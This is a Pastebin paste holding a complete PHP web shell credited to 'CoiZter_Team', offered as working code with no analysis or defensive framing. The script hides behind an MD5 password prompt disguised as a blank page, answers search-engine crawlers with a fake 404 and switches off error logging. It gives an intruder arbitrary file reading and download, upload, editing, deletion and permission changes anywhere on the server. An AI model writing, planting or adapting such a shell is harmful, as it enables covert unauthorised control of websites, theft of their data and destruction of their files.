Advertisement
Guest User

undork

a guest
Apr 26th, 2018
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.63 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11. $auth_pass = "579a460d4f1cf099569b9b9e1d6e5c70";
  12. $color = "white";
  13. $default_action = 'FilesMan';
  14. $default_use_ajax = true;
  15. $default_charset = 'UTF-8';
  16.  
  17. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  18. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  19. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  20. header('HTTP/1.0 404 Not Found');
  21. exit;
  22.  
  23. }
  24.  
  25. }
  26.  
  27. function login_shell() {
  28. ?>
  29. <html>
  30. <head>
  31. <title>about:blank</title>
  32. <style type="text/css">
  33.  
  34. html {
  35. margin: 0px auto;
  36. background: white;
  37. color: maroon;
  38. text-align: center;
  39. }
  40. header {
  41. color: maroon;
  42. margin: 10px auto;
  43. }
  44. input[type=password] {
  45. width: 20px;
  46. height: 15px;
  47. color: maroon;
  48. background: white;
  49. border: 0px dotted white;
  50. padding: 5px;
  51. margin-left: 20px;
  52. text-align: center;
  53.  
  54. }
  55. </style>
  56. </head>
  57. <center>
  58. <form method="post">
  59. <input type="password" name="pass">
  60. </form>
  61. <?php exit;
  62. }
  63. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  64. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else login_shell(); if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  65. @ob_clean(); $file = $_GET['file'];
  66. header('Content-Description: File Transfer');
  67. header('Content-Type: application/octet-stream');
  68. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  69. header('Expires: 0');
  70. header('Cache-Control: must-revalidate');
  71. header('Pragma: public');
  72. header('Content-Length: ' . filesize($file));
  73. readfile($file);
  74. exit;
  75. } ?>
  76. <?php
  77. set_time_limit(0);
  78. error_reporting(0);
  79.  
  80. if(get_magic_quotes_gpc()){
  81. foreach($_POST as $key=>$value){
  82. $_POST[$key] = stripslashes($value);
  83. }
  84. }
  85. echo '<!DOCTYPE HTML>
  86. <html>
  87. <head>
  88. <title>Online</title>
  89. </head>';
  90. ?>
  91. <style>
  92. @font-face {
  93. font-family: 'Audiowide';
  94. font-style: normal;
  95. font-weight: 400;
  96. src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
  97. }
  98. body {
  99.  
  100. background: #353533;line-height: 1;color: #fff;font-family: Comic Sans MS ;
  101.  
  102. }
  103.  
  104. table, th, td {
  105. border-collapse:collapse;
  106. background: transparent;
  107. font-family: Comic Sans MS ;
  108. font-size: 30px;
  109. }
  110. input, textarea { font-family: Comic Sans MS ; }
  111. .table_home, .th_home, .td_home { color:silver;
  112. border: 1px solid red;
  113. }
  114. th {
  115. padding: 10px;
  116. }
  117. .td_home { padding: 7px; }
  118. select {font-family: Comic Sans MS }
  119. a {color:red}
  120. textarea { width: 700%;height: 400px; }
  121. </style>
  122. <style>
  123. .blink {
  124. animation: blink-animation 1s steps(5, start) infinite;
  125. -webkit-animation: blink-animation 1s steps(5, start) infinite;
  126. }
  127. @keyframes blink-animation {
  128. to {
  129. visibility: hidden;
  130. }
  131. }
  132. @-webkit-keyframes blink-animation {
  133. to {
  134. visibility: hidden;
  135. }
  136. }
  137. </style>
  138.  
  139. <?php
  140.  
  141. echo '</head>
  142. <body><b>
  143. <center><span class="blink"><font family="Audiowide" size="500px" color="orange" style="text-shadow: 7px 0px 30px red">Control Panel</span></font></center>
  144. <table width="100%" border="0" cellpadding="1" cellspacing="0" align="center">
  145.  
  146. <tr><td>
  147.  
  148. </font><font style="text-shadow: 7px 0px 30px red" size="4px" color="silver"><center>'.php_uname().'</center></font>';
  149. if(isset($_GET['path'])){
  150. $path = $_GET['path'];
  151. }else{
  152. $path =
  153. getcwd();
  154.  
  155. }
  156. $path = str_replace('\\','/',$path);
  157. $paths = explode('/',$path);
  158.  
  159. foreach($paths as $id=>$pat){
  160. if($pat == '' && $id == 0){
  161. $a = true;
  162. echo '<font size="5px" color=silver style="text-shadow: 7px 0px 30px red"><center>localhost@kehed:~# <font color=teal style="text-shadow: 7px 0px 30px red"><a href="?path=/">/</a>';
  163. continue;
  164. }
  165. if($pat == '') continue;
  166. echo '<a href="?path=';
  167. for($i=0;$i<=$id;$i++){
  168. echo "$paths[$i]";
  169. if($i != $id) echo "/";
  170. }
  171. echo '">'.$pat.'</a>/';
  172. }
  173. echo '</font></center></td></tr><tr><td><center>';
  174. if(isset($_FILES['file'])){
  175. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  176. echo '<font color="teal">Sukses</font><br />';
  177. }else{
  178. echo '<font color="red">Failed -/\-</font><br />';
  179. }
  180. }
  181. echo '</center><center><form enctype="multipart/form-data" method="POST"><font size="50px" color="black" style="text-shadow: 7px 0px 30px red"><input style="background:black;font-family:Audiowide;width:30% " type="file" name="file" /> <input type="submit" value=">>>" />
  182. </form></center>
  183. </td></tr>';
  184. if(isset($_GET['filesrc'])){
  185. echo "<tr><td><center>Current File : ";
  186. echo $_GET['filesrc'];
  187. echo '</center></tr></td></table><br />';
  188. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  189. }
  190. //Empty
  191. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
  192. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  193. //Chmod
  194. if($_GET['opt'] == 'chmod'){
  195. if(isset($_POST['perm'])){
  196. if(chmod($_POST['path'],$_POST['perm'])){
  197. echo '<font color="teal">Change Permission Done </font><br />';
  198. }else{
  199. echo '<font color="red">Change Permission Error </font><br />';
  200. }
  201. }
  202.  
  203. $hell = $_GET['path'];
  204. $yeah = $_GET['name'];
  205. $patc = "$hell/$yeah";
  206.  
  207. echo '<form method="POST">
  208. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
  209. <input type="hidden" name="path" value="'.$_POST['path'].'">
  210. <input type="hidden" name="opt" value="chmod">
  211. <input type="submit" value=">>>" />
  212. </form>';
  213. }
  214. //
  215. elseif($_GET['opt'] == 'btw'){
  216. $cwd = getcwd();
  217. echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
  218. New Name : <input name="name" type="text" size="20" value="Folder" />
  219. <input type="hidden" name="path" value="'.$cwd.'">
  220. <input type="hidden" name="opt" value="delete">
  221. <input type="submit" value=">>>" />
  222. </form>';
  223. }
  224. //Rename file
  225. elseif($_GET['opt'] == 'rename'){
  226. if(isset($_POST['newname'])){
  227. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  228. echo '<font color="teal">Change Name Done </font><br />';
  229. }else{
  230. echo '<font color="red">Change Name Error </font><br />';
  231. }
  232. $_POST['name'] = $_POST['newname'];
  233. }
  234. $hell = $_GET['path'];
  235. $yeah = $_GET['name'];
  236. $patc = "$hell/$yeah";
  237. $new = $_POST['newname'];
  238.  
  239. echo '<form method="POST">
  240. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
  241. <input type="hidden" name="path" value="'.$patc.'">
  242. <input type="hidden" name="opt" value="rename">
  243. <input type="submit" value=">>>" />
  244. </form>';
  245. }
  246. //File baru
  247. elseif($_GET['opt'] == 'baru'){
  248.  
  249. $hell = $_GET['path'];
  250. $yeah = $_GET['name'];
  251. $patc = "$hell/$yeah";
  252. $new = $_POST['newname'];
  253. $azz = $_POST['path'];
  254. $newz = "$azz/$new";
  255.  
  256.  
  257. if(isset($_POST['src'])){
  258. $fp = fopen($_POST['path'],'w');
  259. if(fwrite($fp,$_POST['src'])){
  260. echo '<font color="teal">Create File Done [ '.$new.' ]</font><br />';
  261. }else{
  262. echo '<font color="red">Create File Error </font><br />';
  263. }
  264. fclose($fp);
  265. }
  266.  
  267. echo '<form method="POST"> Name : <input name="name1" type="text" size="20" value="'.$new.'" /><input type="submit" name="buat" value=">>>"/></form><br> ';
  268.  
  269. $ho = $_POST['name1'];
  270.  
  271. if(isset($_POST['buat'])){
  272. echo '<form method="POST">
  273. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  274. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
  275. <input type="hidden" name="opt" value="edit">
  276. <input type="submit" value=">>>" />
  277. </form>';
  278. }
  279. }
  280. //Edited file
  281. elseif($_GET['opt'] == 'edit'){
  282. if(isset($_POST['src'])){
  283. $fp = fopen($_POST['path'],'w');
  284. if(fwrite($fp,$_POST['src'])){
  285. echo '<font color="teal">Edit File Done </font><br />';
  286. }else{
  287. echo '<font color="red">Edit File Error </font><br />';
  288. }
  289. fclose($fp);
  290. }
  291. $hell = $_GET['path'];
  292. $yeah = $_GET['name'];
  293. $patc = "$hell/$yeah";
  294. echo '<form method="POST">
  295. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  296. <input type="hidden" name="path" value="'.$patc.'">
  297. <input type="hidden" name="opt" value="edit">
  298. <input type="submit" value=">>>" />
  299. </form>';
  300. }
  301. echo '</center>';
  302. }else{
  303. echo '</table><br /><center>';
  304. //Delete dir and file
  305. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
  306.  
  307. $hell = $_GET['path'];
  308. $yeah = $_GET['name'];
  309. $patc = "$hell/$yeah";
  310.  
  311. //Delete dir
  312. if($_GET['type'] == 'dir'){
  313.  
  314. if(rmdir($patc)){
  315. echo '<font color="teal">Delete File Done </font><br />';
  316. }else{
  317. echo '<font color="red#">Delete File Error </font><br />';
  318. }
  319. }
  320. //buat folder
  321. if($_GET['type'] == 'buat'){
  322. $haaa = $_POST['path'];
  323. $heee = $_POST['name'];
  324. $hooo = "$haaa/$heee";
  325. $new = $haaa.'/'.htmlspecialchars($heee);
  326. if(!mkdir($new)){
  327. echo '<font color="red">Create Folder Error </font><br />';
  328. }else{
  329. echo '<font color="teal">Create Folder Done </font><br />';
  330. }
  331. }
  332. //Delete file
  333. elseif($_GET['type'] == 'file'){
  334.  
  335. $hell = $_GET['path'];
  336. $yeah = $_GET['name'];
  337. $patc = "$hell/$yeah";
  338.  
  339. if(unlink($patc)){
  340. echo '<font color="teal">Delete File Done </font><br />';
  341. }else{
  342. echo '<font color="red#">Delete File Error </font><br />';
  343. }
  344. }
  345. }
  346. echo '</center>';
  347. $scandir = scandir($path);
  348. $pa = getcwd();
  349. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  350. <tr>
  351. <th class=th_home style="background:black;color:silver;text-shadow: 7px 0px 30px red;" ><center>Name</center></th>
  352. <th class=th_home style="background:black;color:silver;text-shadow: 7px 0px 30px red;" ><center>Size</center></th>
  353. <th class=th_home style="background:black;color:silver;text-shadow: 7px 0px 30px red;" ><center>Perm</center></th>
  354. <th class=th_home style="background:black;color:silver;text-shadow: 7px 0px 30px red;" ><center>Options</center></th>
  355. </tr> <tr>
  356. <td class=td_home>..</td><td class=td_home align=center>-</td> <td class=td_home align=center>-</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php">{file}</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir">{dir}</a> </td></tr>
  357. ';
  358.  
  359. foreach($scandir as $dir){
  360. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  361. echo "
  362. <tr>
  363. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\">$dir</a></td>
  364. <td class=td_home ><center>dir</center></td>
  365. <td class=td_home ><center>";
  366. if(is_writable("$path/$dir")) echo '<font color="teal">';
  367. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  368. echo perms("$path/$dir");
  369. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  370.  
  371. echo "</center></td>
  372. <td class=td_home ><center>
  373. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\">{r}</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\">{d}</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\">{c}</a>
  374.  
  375. </center></td>
  376. </tr>";
  377. }
  378. echo '<br>';
  379. foreach($scandir as $file){
  380. if(!is_file("$path/$file")) continue;
  381. $size = filesize("$path/$file")/1024;
  382. $size = round($size,3);
  383. if($size >= 1024){
  384. $size = round($size/1024,2).' MB';
  385. }else{
  386. $size = $size.' KB';
  387. }
  388.  
  389. echo "<tr>
  390. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  391. <td class=td_home><center>".$size."</center></td>
  392. <td class=td_home><center>";
  393. if(is_writable("$path/$file")) echo '<font color="teal">';
  394. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  395. echo perms("$path/$file");
  396. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  397. echo "</center></td>
  398. <td class=td_home><center>
  399. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\"> {e} </a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\"> {r} </a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\"> {d} </a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\"> {c} </a>
  400. </center></td>
  401. </tr>";
  402. }
  403. echo '</table>
  404. </div>';
  405. }
  406. echo '<br><center><font color="silver" style="text-shadow: 7px 0px 30px red"> Copyright - CoiZter_Team</b></body>
  407. </html>';
  408. function perms($file){
  409. $perms = fileperms($file);
  410.  
  411. if (($perms & 0xC000) == 0xC000) {
  412. // Socket
  413. $info = 's';
  414. } elseif (($perms & 0xA000) == 0xA000) {
  415. // Symbolic Link
  416. $info = 'l';
  417. } elseif (($perms & 0x8000) == 0x8000) {
  418. // Regular
  419. $info = '-';
  420. } elseif (($perms & 0x6000) == 0x6000) {
  421. // Block special
  422. $info = 'b';
  423. } elseif (($perms & 0x4000) == 0x4000) {
  424. // Directory
  425. $info = 'd';
  426. } elseif (($perms & 0x2000) == 0x2000) {
  427. // Character special
  428. $info = 'c';
  429. } elseif (($perms & 0x1000) == 0x1000) {
  430. // FIFO pipe
  431. $info = 'p';
  432. } else {
  433. // Unknown
  434. $info = 'u';
  435. }
  436.  
  437. // Owner
  438. $info .= (($perms & 0x0100) ? 'r' : '-');
  439. $info .= (($perms & 0x0080) ? 'w' : '-');
  440. $info .= (($perms & 0x0040) ?
  441. (($perms & 0x0800) ? 's' : 'x' ) :
  442. (($perms & 0x0800) ? 'S' : '-'));
  443.  
  444. // Group
  445. $info .= (($perms & 0x0020) ? 'r' : '-');
  446. $info .= (($perms & 0x0010) ? 'w' : '-');
  447. $info .= (($perms & 0x0008) ?
  448. (($perms & 0x0400) ? 's' : 'x' ) :
  449. (($perms & 0x0400) ? 'S' : '-'));
  450.  
  451. // World
  452. $info .= (($perms & 0x0004) ? 'r' : '-');
  453. $info .= (($perms & 0x0002) ? 'w' : '-');
  454. $info .= (($perms & 0x0001) ?
  455. (($perms & 0x0200) ? 't' : 'x' ) :
  456. (($perms & 0x0200) ? 'T' : '-'));
  457.  
  458. return $info;
  459. }
  460.  
  461. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement